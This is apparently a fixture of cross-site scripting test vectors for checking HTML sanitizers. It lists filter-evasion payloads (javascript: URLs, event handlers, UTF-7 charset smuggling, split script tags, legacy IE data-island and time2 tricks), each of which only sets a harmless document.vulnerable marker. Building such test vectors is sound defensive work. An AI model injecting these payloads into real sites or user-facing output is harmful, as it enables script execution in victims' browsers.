UWOWRYXVONHMAGJ GG

<img src="javascript:document.vulnerable=true;">

<img dynsrc="javascript:document.vulnerable=true;">

<img src="javascript:document.vulnerable=true;">

<img dynsrc="javascript:document.vulnerable=true;">

<div onmouseover="document.vulnerable=true;">

<div onmouseover="document.vulnerable=true;">

<a href="javascript#document.vulnerable=true;">

<a href="javascript#document.vulnerable=true;">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD> ADw-SCRIPT AD4-document.vulnerable=true; ADw-/SCRIPT AD4-

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-

<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>

<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></HTML>

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></HTML>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>